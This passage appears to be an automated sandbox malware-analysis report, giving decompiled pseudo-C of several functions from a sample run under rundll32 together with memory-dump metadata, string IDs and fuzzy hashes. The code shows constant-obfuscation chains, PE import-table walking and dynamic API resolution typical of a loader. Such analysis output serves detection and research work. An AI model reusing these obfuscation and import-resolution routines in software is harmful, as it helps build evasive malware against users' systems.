                                                                                                                          				_v52 = 0x3419b2;
                                                                                                                          				_v52 = _v52 / _t133;
                                                                                                                          				_v52 = _v52 >> 0xc;
                                                                                                                          				_v52 = _v52 | 0xcef26f8a;
                                                                                                                          				_v52 = _v52 ^ 0xcef1d6cf;
                                                                                                                          				_v4 = 0xb26f64;
                                                                                                                          				_t134 = 3;
                                                                                                                          				_v4 = _v4 / _t134;
                                                                                                                          				_v4 = _v4 ^ 0x003ff5cc;
                                                                                                                          				_v40 = 0x34a33d;
                                                                                                                          				_v40 = _v40 >> 4;
                                                                                                                          				_v40 = _v40 ^ 0xd21b54bd;
                                                                                                                          				_v40 = _v40 ^ 0x33ae4ce0;
                                                                                                                          				_v40 = _v40 ^ 0xe1b00bb7;
                                                                                                                          				_v8 = 0x4c76b4;
                                                                                                                          				_v8 = _v8 << 2;
                                                                                                                          				_v8 = _v8 ^ 0x013e4034;
                                                                                                                          				_v24 = 0x1c9e42;
                                                                                                                          				_v24 = _v24 ^ 0x4f10b4b5;
                                                                                                                          				_v24 = _v24 << 4;
                                                                                                                          				_v24 = _v24 ^ 0xf0cd9088;
                                                                                                                          				_v44 = 0xfe69b1;
                                                                                                                          				_v44 = _v44 >> 0xd;
                                                                                                                          				_v44 = _v44 * 0x49;
                                                                                                                          				_v44 = _v44 * 0x7d;
                                                                                                                          				_v44 = _v44 ^ 0x011db47c;
                                                                                                                          				_v28 = 0x46ec28;
                                                                                                                          				_v28 = _v28 << 9;
                                                                                                                          				_v28 = _v28 * 0x58;
                                                                                                                          				_v28 = _v28 ^ 0xc2551a85;
                                                                                                                          				_t135 =  *0x7b3e0c; // 0x0
                                                                                                                          				do {
                                                                                                                          					while(_t146 != 0x4903f33) {
                                                                                                                          						if(_t146 == 0x6f617aa) {
                                                                                                                          							_t128 = E007946BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E007981B7, _v28);
                                                                                                                          							_t135 =  *0x7b3e0c; // 0x0
                                                                                                                          							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
                                                                                                                          						} else {
                                                                                                                          							if(_t146 != 0xc69f0b3) {
                                                                                                                          								goto L6;
                                                                                                                          							} else {
                                                                                                                          								_t131 = E00797AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
                                                                                                                          								_t135 =  *0x7b3e0c; // 0x0
                                                                                                                          								_t148 =  &(_t148[6]);
                                                                                                                          								_t146 = 0x6f617aa;
                                                                                                                          								 *((intOrPtr*)(_t135 + 8)) = _t131;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L9:
                                                                                                                          						return 0 | _t135 != 0x00000000;
                                                                                                                          					}
                                                                                                                          					_push(_t135);
                                                                                                                          					_push(_t135);
                                                                                                                          					_t143 = 0x24;
                                                                                                                          					_t135 = E00797FF2(_t143);
                                                                                                                          					_t146 = 0xc69f0b3;
                                                                                                                          					 *0x7b3e0c = _t135;
                                                                                                                          					L6:
                                                                                                                          				} while (_t146 != 0xab42793);
                                                                                                                          				goto L9;
                                                                                                                          			}

























                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (F$"
                                                                                                                          • API String ID: 0-1034852068
                                                                                                                          • Opcode ID: ecdf6594877d7cba06e3d6748a117bc233c486364c9e36d44b2b5a47d6ffc6d7
                                                                                                                          • Instruction ID: d87d2bdd8d543cd974dc65808c2ec2900bb8d8e22054ba53f287334d933bbb07
                                                                                                                          • Opcode Fuzzy Hash: ecdf6594877d7cba06e3d6748a117bc233c486364c9e36d44b2b5a47d6ffc6d7
                                                                                                                          • Instruction Fuzzy Hash: 3A5144714093019FC758CF25E58A80FBBE1EB84758F108A1EF595AA260D3B5DA49CF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E00797C37(void* __ecx, void* __edx) {
                                                                                                                          				void* _t91;
                                                                                                                          				void* _t102;
                                                                                                                          				signed short _t108;
                                                                                                                          				signed short _t111;
                                                                                                                          				signed short _t113;
                                                                                                                          				signed int _t115;
                                                                                                                          				signed int _t116;
                                                                                                                          				signed int _t117;
                                                                                                                          				signed short _t121;
                                                                                                                          				intOrPtr _t128;
                                                                                                                          				signed short* _t132;
                                                                                                                          				signed short _t133;
                                                                                                                          				intOrPtr _t134;
                                                                                                                          				void* _t135;
                                                                                                                          				void* _t136;
                                                                                                                          
                                                                                                                          				_t134 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                          				_push(_t134);
                                                                                                                          				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                          				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t91);
                                                                                                                          				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
                                                                                                                          				_t136 = _t135 + 0x14;
                                                                                                                          				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
                                                                                                                          				_t115 = 0x47;
                                                                                                                          				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
                                                                                                                          				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
                                                                                                                          				 *(_t136 + 0x28) = 0x411077;
                                                                                                                          				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
                                                                                                                          				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
                                                                                                                          				 *(_t136 + 0x14) = 0x6ab109;
                                                                                                                          				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
                                                                                                                          				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
                                                                                                                          				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
                                                                                                                          				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
                                                                                                                          				 *(_t136 + 0x3c) = 0x583f0;
                                                                                                                          				_t116 = 0x13;
                                                                                                                          				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
                                                                                                                          				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
                                                                                                                          				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
                                                                                                                          				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
                                                                                                                          				 *(_t136 + 0x28) = 0xeb6063;
                                                                                                                          				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
                                                                                                                          				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
                                                                                                                          				 *(_t136 + 0x20) = 0x8f08a1;
                                                                                                                          				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
                                                                                                                          				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
                                                                                                                          				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
                                                                                                                          				 *(_t136 + 0x1c) = 0x46d0e7;
                                                                                                                          				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
                                                                                                                          				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
                                                                                                                          				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
                                                                                                                          				 *(_t136 + 0x14) = 0x9e0f5b;
                                                                                                                          				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
                                                                                                                          				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
                                                                                                                          				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
                                                                                                                          				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
                                                                                                                          				_t117 =  *(_t136 + 0x18);
                                                                                                                          				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                                                                                                          				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
                                                                                                                          				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
                                                                                                                          					L13:
                                                                                                                          					return 1;
                                                                                                                          				} else {
                                                                                                                          					_t133 = _t128 + _t134;
                                                                                                                          					while(1) {
                                                                                                                          						_t105 =  *((intOrPtr*)(_t133 + 0xc));
                                                                                                                          						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          						_t121 = E007ACADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
                                                                                                                          						 *(_t136 + 0x18) = _t121;
                                                                                                                          						__eflags = _t121;
                                                                                                                          						if(_t121 == 0) {
                                                                                                                          							L15:
                                                                                                                          							return 0;
                                                                                                                          						}
                                                                                                                          						_t132 =  *_t133 + _t134;
                                                                                                                          						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
                                                                                                                          						while(1) {
                                                                                                                          							_t108 =  *_t132;
                                                                                                                          							__eflags = _t108;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							if(__eflags >= 0) {
                                                                                                                          								_t110 = _t108 + 2 + _t134;
                                                                                                                          								__eflags = _t108 + 2 + _t134;
                                                                                                                          							} else {
                                                                                                                          								_t110 = _t108 & 0x0000ffff;
                                                                                                                          							}
                                                                                                                          							_t111 = E00796CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
                                                                                                                          							_t136 = _t136 + 0x10;
                                                                                                                          							__eflags = _t111;
                                                                                                                          							if(_t111 == 0) {
                                                                                                                          								goto L15;
                                                                                                                          							} else {
                                                                                                                          								_t121 =  *(_t136 + 0x18);
                                                                                                                          								_t132 =  &(_t132[2]);
                                                                                                                          								 *_t113 = _t111;
                                                                                                                          								_t113 = _t113 + 4;
                                                                                                                          								__eflags = _t113;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t133 = _t133 + 0x14;
                                                                                                                          						__eflags = _t133;
                                                                                                                          					}
                                                                                                                          					goto L13;
                                                                                                                          				}
                                                                                                                          			}



















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: X^wE$c`
                                                                                                                          • API String ID: 0-1321574684
                                                                                                                          • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                          • Instruction ID: f3ab49104a096e279b235528dfbe0f772db6c94ac4290374ce3102b98cf54911
                                                                                                                          • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                          • Instruction Fuzzy Hash: 9B5186716083029FCB18DF24E88692BBBE1FFC4358F10481DF48696221E375DA48CF92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 62%
                                                                                                                          			E00794C5D(intOrPtr _a4) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				void* _t106;
                                                                                                                          				void* _t108;
                                                                                                                          				intOrPtr* _t109;
                                                                                                                          				signed int _t112;
                                                                                                                          				signed int _t113;
                                                                                                                          				signed int _t114;
                                                                                                                          				intOrPtr _t128;
                                                                                                                          
                                                                                                                          				_v44 = _v44 & 0x00000000;
                                                                                                                          				_v48 = 0xad4f7a;
                                                                                                                          				_v16 = 0xf18dbd;
                                                                                                                          				_v16 = _v16 + 0xffff4795;
                                                                                                                          				_v16 = _v16 << 0xe;
                                                                                                                          				_v16 = _v16 >> 6;
                                                                                                                          				_v16 = _v16 ^ 0x00dff17e;
                                                                                                                          				_v12 = 0xaf5949;
                                                                                                                          				_v12 = _v12 | 0xe2d389df;
                                                                                                                          				_v12 = _v12 + 0x286;
                                                                                                                          				_t112 = 3;
                                                                                                                          				_v12 = _v12 / _t112;
                                                                                                                          				_v12 = _v12 ^ 0x4ba32b72;
                                                                                                                          				_v24 = 0x2aefd1;
                                                                                                                          				_t113 = 0x7d;
                                                                                                                          				_t128 = _a4;
                                                                                                                          				_v24 = _v24 * 0x59;
                                                                                                                          				_v24 = _v24 << 2;
                                                                                                                          				_v24 = _v24 ^ 0x3bb9ca43;
                                                                                                                          				_v8 = 0x985427;
                                                                                                                          				_v8 = _v8 << 2;
                                                                                                                          				_v8 = _v8 ^ 0x713a2c3c;
                                                                                                                          				_v8 = _v8 | 0x45eb1ca3;
                                                                                                                          				_v8 = _v8 ^ 0x77f5f6d4;
                                                                                                                          				_v28 = 0xa7f2b4;
                                                                                                                          				_v28 = _v28 >> 0xc;
                                                                                                                          				_v28 = _v28 + 0x7e4a;
                                                                                                                          				_v28 = _v28 ^ 0x000cc7a8;
                                                                                                                          				_v40 = 0x7087c6;
                                                                                                                          				_t114 = 0x69;
                                                                                                                          				_v40 = _v40 / _t113;
                                                                                                                          				_v40 = _v40 ^ 0x00014835;
                                                                                                                          				_v20 = 0xcde00b;
                                                                                                                          				_v20 = _v20 + 0xffffcf30;
                                                                                                                          				_v20 = _v20 | 0xcdf6f1c4;
                                                                                                                          				_v20 = _v20 + 0xfc2b;
                                                                                                                          				_v20 = _v20 ^ 0xce0272c5;
                                                                                                                          				_v36 = 0x30875a;
                                                                                                                          				_v36 = _v36 * 0x47;
                                                                                                                          				_v36 = _v36 / _t114;
                                                                                                                          				_v36 = _v36 ^ 0x0028facf;
                                                                                                                          				_v32 = 0x6c449b;
                                                                                                                          				_v32 = _v32 >> 0xf;
                                                                                                                          				_v32 = _v32 + 0xffff12fc;
                                                                                                                          				_v32 = _v32 ^ 0xfff19483;
                                                                                                                          				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
                                                                                                                          				_t134 = _t106;
                                                                                                                          				if(_t106 != 0) {
                                                                                                                          					_push(_v8);
                                                                                                                          					_push(_v24);
                                                                                                                          					_push(_v12);
                                                                                                                          					_t108 = E007A8606(_v16, 0x791378, _t134);
                                                                                                                          					_push(_v20);
                                                                                                                          					_t130 = _t108;
                                                                                                                          					_push(_t108);
                                                                                                                          					_push(_v40);
                                                                                                                          					_t109 = E0079CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
                                                                                                                          					if(_t109 != 0) {
                                                                                                                          						 *_t109();
                                                                                                                          					}
                                                                                                                          					E0079A8B0(_v36, _t130, _v32);
                                                                                                                          				}
                                                                                                                          				return 0;
                                                                                                                          			}






















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: <,:q$J~
                                                                                                                          • API String ID: 0-951887683
                                                                                                                          • Opcode ID: ab4e2e9656927a58004d355011aaf343a0fb4b531af89c21cd6ec765053635f1
                                                                                                                          • Instruction ID: 4272f423a46f1d1a07357b8689992901e8643d78b942dfef8fa5502dcaea34a2
                                                                                                                          • Opcode Fuzzy Hash: ab4e2e9656927a58004d355011aaf343a0fb4b531af89c21cd6ec765053635f1
                                                                                                                          • Instruction Fuzzy Hash: 0B411F71D0130AEBDF08CFA1D94A9EEBBB1FB54314F208159D510BA2A0D7B90B55CFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0079EE81(void* __eflags) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				char _v44;
                                                                                                                          				short _v48;
                                                                                                                          				short _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				char _v576;
                                                                                                                          				intOrPtr* _t95;
                                                                                                                          				signed int _t99;
                                                                                                                          				signed int _t100;
                                                                                                                          
                                                                                                                          				_v56 = 0x3b8b1c;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_v52 = 0;
                                                                                                                          				_v48 = 0;
                                                                                                                          				_v8 = 0xf9e323;
                                                                                                                          				_v8 = _v8 ^ 0x73816ffa;
                                                                                                                          				_v8 = _v8 + 0x5b26;
                                                                                                                          				_v8 = _v8 ^ 0x387262e7;
                                                                                                                          				_v8 = _v8 ^ 0x4b076809;
                                                                                                                          				_v20 = 0x75aab0;
                                                                                                                          				_v20 = _v20 ^ 0xc40c30fa;
                                                                                                                          				_v20 = _v20 + 0x78e9;
                                                                                                                          				_v20 = _v20 ^ 0xc4737271;
                                                                                                                          				_v16 = 0xa8e87a;
                                                                                                                          				_v16 = _v16 + 0xffff799a;
                                                                                                                          				_t99 = 0x33;
                                                                                                                          				_v16 = _v16 / _t99;
                                                                                                                          				_v16 = _v16 ^ 0x000fed3f;
                                                                                                                          				_v28 = 0x7feeb5;
                                                                                                                          				_v28 = _v28 + 0xffffe4f6;
                                                                                                                          				_v28 = _v28 ^ 0x007d0c9c;
                                                                                                                          				_v32 = 0x59c916;
                                                                                                                          				_t100 = 0x5d;
                                                                                                                          				_v32 = _v32 / _t100;
                                                                                                                          				_v32 = _v32 ^ 0x000d1fec;
                                                                                                                          				_v12 = 0x866588;
                                                                                                                          				_v12 = _v12 ^ 0x68ade4cb;
                                                                                                                          				_v12 = _v12 + 0xffffbaa5;
                                                                                                                          				_v12 = _v12 ^ 0x68223e43;
                                                                                                                          				_v36 = 0xbafac2;
                                                                                                                          				_v36 = _v36 ^ 0x5e34b155;
                                                                                                                          				_v36 = _v36 ^ 0x5e8c811c;
                                                                                                                          				_v24 = 0xc770cb;
                                                                                                                          				_v24 = _v24 >> 0xf;
                                                                                                                          				_v24 = _v24 ^ 0x95635bf4;
                                                                                                                          				_v24 = _v24 ^ 0x956359d7;
                                                                                                                          				_v40 = 0xbd0b83;
                                                                                                                          				_v40 = _v40 >> 3;
                                                                                                                          				_v40 = _v40 ^ 0x001e2563;
                                                                                                                          				_t101 = _v8;
                                                                                                                          				if(E007A8F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
                                                                                                                          					_t95 =  &_v576;
                                                                                                                          					if(_v576 != 0) {
                                                                                                                          						while( *_t95 != 0x5c) {
                                                                                                                          							_t95 = _t95 + 2;
                                                                                                                          							if( *_t95 != 0) {
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          							}
                                                                                                                          							goto L6;
                                                                                                                          						}
                                                                                                                          						_t101 = 0;
                                                                                                                          						 *((short*)(_t95 + 2)) = 0;
                                                                                                                          					}
                                                                                                                          					L6:
                                                                                                                          					E007ADB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
                                                                                                                          				}
                                                                                                                          				return _v44;
                                                                                                                          			}





















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: C>"h$br8
                                                                                                                          • API String ID: 0-573140060
                                                                                                                          • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                          • Instruction ID: 7ce2ce72603691c2669155e973e8efaa217506894886ec9f76cd352817f6b043
                                                                                                                          • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                          • Instruction Fuzzy Hash: 8041F271C0121DEBCF58CFE4D94A5EEBBB5FB04304F20819AE515B6260E3B45A55CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E007AAA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				unsigned int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				void* _t83;
                                                                                                                          				signed int _t85;
                                                                                                                          				signed int _t91;
                                                                                                                          
                                                                                                                          				_v40 = _v40 & 0x00000000;
                                                                                                                          				_v48 = 0xea50c7;
                                                                                                                          				_v44 = 0x183406;
                                                                                                                          				_v8 = 0x4cb37c;
                                                                                                                          				_v8 = _v8 + 0xc736;
                                                                                                                          				_v8 = _v8 + 0xd4a7;
                                                                                                                          				_t91 = __edx;
                                                                                                                          				_t85 = 0x64;
                                                                                                                          				_v8 = _v8 * 0x2d;
                                                                                                                          				_v8 = _v8 ^ 0x0dcd94f9;
                                                                                                                          				_v24 = 0x238f3e;
                                                                                                                          				_v24 = _v24 << 3;
                                                                                                                          				_v24 = _v24 ^ 0x011b8be3;
                                                                                                                          				_v20 = 0x73abc8;
                                                                                                                          				_v20 = _v20 >> 3;
                                                                                                                          				_v20 = _v20 ^ 0x00035013;
                                                                                                                          				_v16 = 0x5012b6;
                                                                                                                          				_v16 = _v16 >> 0x10;
                                                                                                                          				_v16 = _v16 / _t85;
                                                                                                                          				_v16 = _v16 ^ 0x000aff4c;
                                                                                                                          				_v12 = 0x8c34bb;
                                                                                                                          				_v12 = _v12 | 0x8c5a3f77;
                                                                                                                          				_v12 = _v12 + 0xffff11fb;
                                                                                                                          				_v12 = _v12 ^ 0x2d4fbea1;
                                                                                                                          				_v12 = _v12 ^ 0xa19c1e56;
                                                                                                                          				_v36 = 0xff820a;
                                                                                                                          				_v36 = _v36 | 0x4fe4a4bc;
                                                                                                                          				_v36 = _v36 ^ 0x4ffdd4f4;
                                                                                                                          				_v32 = 0x36506a;
                                                                                                                          				_v32 = _v32 + 0x4de;
                                                                                                                          				_v32 = _v32 ^ 0x003709b9;
                                                                                                                          				_v28 = 0x64fd3b;
                                                                                                                          				_v28 = _v28 + 0xffff3e7a;
                                                                                                                          				_v28 = _v28 ^ 0x00656766;
                                                                                                                          				if( *((intOrPtr*)(0x7b3210 + __edx * 4)) == 0) {
                                                                                                                          					_t83 = E007A0A0E(_t85, _t85, _a4);
                                                                                                                          					_push(_v28);
                                                                                                                          					_push(_a12);
                                                                                                                          					_push(_v32);
                                                                                                                          					_push(_t83);
                                                                                                                          					 *((intOrPtr*)(0x7b3210 + _t91 * 4)) = E0079CDCD(_v12, _v36);
                                                                                                                          				}
                                                                                                                          				return  *((intOrPtr*)(0x7b3210 + _t91 * 4));
                                                                                                                          			}


















                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: fge$jP6
                                                                                                                          • API String ID: 0-775479084
                                                                                                                          • Opcode ID: 7c7c1042f83724c588581aba1f66b35de7d1e9d05b401af0a62442b1cec21573
                                                                                                                          • Instruction ID: c2136352cef944937c7751ba1301c57875111564e7230259600b31e3cb73a0bd
                                                                                                                          • Opcode Fuzzy Hash: 7c7c1042f83724c588581aba1f66b35de7d1e9d05b401af0a62442b1cec21573
                                                                                                                          • Instruction Fuzzy Hash: 1231EFB1C0020DEBCF08CFA4CA4A9EEBBB5FB09308F108148D511B6220C3B95B49CF95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E007B0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				void* _t61;
                                                                                                                          				intOrPtr _t66;
                                                                                                                          				void* _t73;
                                                                                                                          				intOrPtr* _t74;
                                                                                                                          
                                                                                                                          				_t74 = _a16;
                                                                                                                          				_push(_t74);
                                                                                                                          				_push(_a12);
                                                                                                                          				_t73 = __ecx;
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t61);
                                                                                                                          				_v16 = 0x2b4f5d;
                                                                                                                          				_v16 = _v16 * 0x1c;
                                                                                                                          				_v16 = _v16 >> 8;
                                                                                                                          				_v16 = _v16 ^ 0x000abada;
                                                                                                                          				_v24 = 0x6f176d;
                                                                                                                          				_v24 = _v24 | 0x8892b5fd;
                                                                                                                          				_v24 = _v24 ^ 0x88fd6dba;
                                                                                                                          				_v12 = 0x9049ef;
                                                                                                                          				_v12 = _v12 >> 4;
                                                                                                                          				_v12 = _v12 ^ 0x7aa47b64;
                                                                                                                          				_v12 = _v12 ^ 0x7aa68413;
                                                                                                                          				_a16 = 0x9c064;
                                                                                                                          				_a16 = _a16 + 0x4e6a;
                                                                                                                          				_a16 = _a16 + 0xffffd44e;
                                                                                                                          				_a16 = _a16 | 0x475ceb65;
                                                                                                                          				_a16 = _a16 ^ 0x47532e3d;
                                                                                                                          				_v8 = 0xaf6c6f;
                                                                                                                          				_v8 = _v8 >> 6;
                                                                                                                          				_v8 = _v8 + 0xad29;
                                                                                                                          				_v8 = _v8 + 0xd52;
                                                                                                                          				_v8 = _v8 ^ 0x000b7d9e;
                                                                                                                          				_v20 = 0xd79f7b;
                                                                                                                          				_v20 = _v20 ^ 0x214a9efd;
                                                                                                                          				_v20 = _v20 >> 5;
                                                                                                                          				_v20 = _v20 ^ 0x010f9d8f;
                                                                                                                          				E007A0DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
                                                                                                                          				E0079ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
                                                                                                                          				_t66 =  *((intOrPtr*)(_t74 + 4));
                                                                                                                          				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
                                                                                                                          				return _t66;
                                                                                                                          			}













                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
